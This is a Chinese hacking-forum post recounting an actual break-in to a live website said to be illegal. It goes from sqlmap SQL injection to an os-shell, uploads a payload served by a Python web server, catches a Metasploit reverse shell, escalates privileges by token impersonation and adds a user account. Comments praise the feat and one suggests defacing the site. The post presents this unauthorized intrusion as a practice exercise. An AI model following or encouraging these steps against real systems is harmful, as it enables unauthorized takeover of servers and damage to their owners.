非法网站从sqlmap到msf提权远程连接成功

fenghua123   ·   发表于 2020-09-03 17:09:45   ·   实战纪实

一 前言


这段时间一直在捣鼓sql注入和msf联合getshell,拿到网站服务器。

1.1收集信息

因为主要想练习sql注入,所以信息收集做的比较简单:
通过sqlmap获取shell权限利用msf获取反弹shell并getshell成功
通过fofa找到相关cms


发现后台登录页面有post sql注入

1.2利用sqlmap一把梭并获取os-shell

二.利用python搭建一个简单的http服务器

python -m SimpleHTTPServer


1.1在这里要给他的服务器写入一个目录
md C:\test
1.用自己的服务器上文件上传到被攻击服务器上

三 然后我们在msf上操作

1.1 :输入 use exploit/mulit/hander
1.2 : 输入 set lhost 接收反弹shell的ip
1.2 :输入 run 一把嗦

四.成功进入该服务器

这时发现我们只有gust权限 难受

五.开启艰难的提权之路

1.1利用方法

内核提权

窃取管理tokens 提权

弟弟目前只知道着两种

本文只利用tokens 提权方式 有机会写一篇 内核提权的文章


使用use incognito来加载会话令牌模块
然后list_tokens -u来列出会话令牌


———————————————————————————————————————————————————————————————————
提权成功

六.创建用户

命令:net user 用户名 密码 /add

思索许久……发现忘了把自己加入管理员用户组了 !!!!!


搞定

用户名金币积分时间理由
和谐文明 5.00 0 2020-09-07 08:08:29 一个受益终生的帖子~~
奖励系统 100.00 0 2020-09-03 21:09:53 投稿满 10 赞奖励
奖励系统 50.00 0 2020-09-03 19:07:41 投稿满 5 赞奖励
炸宝宝 10.00 0 2020-09-03 18:06:33 一个受益终生的帖子~~
锦衣 5.00 0 2020-09-03 17:05:40 一个受益终生的帖子~~
Track-聂风 80.00 0 2020-09-03 17:05:25 鼓励同学第一次实战,提权可以再想一想,可以找一找有没有其他漏洞

打赏我,让我更有动力~

6 Reply   |  Until 2020-9-8 | 2887 View

锦衣
发表于 2020-9-3

膜拜大佬

评论列表

  • 加载数据中...

编写评论内容

qq605198466
发表于 2020-9-3

风华大佬666

评论列表

  • 加载数据中...

编写评论内容

1501113044
发表于 2020-9-3

来瞻仰风华大佬

评论列表

  • 加载数据中...

编写评论内容

秋紫山
发表于 2020-9-3

大佬大佬带带dd

评论列表

  • 加载数据中...

编写评论内容

leite951
发表于 2020-9-4

好熟悉的登录界面

评论列表

  • 加载数据中...

编写评论内容

yslfei
发表于 2020-9-8

怎么不把他的网站页面上传 黑页 还放一首歌 宝贝对不起 气死他

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2023 掌控者 All Rights Reserved.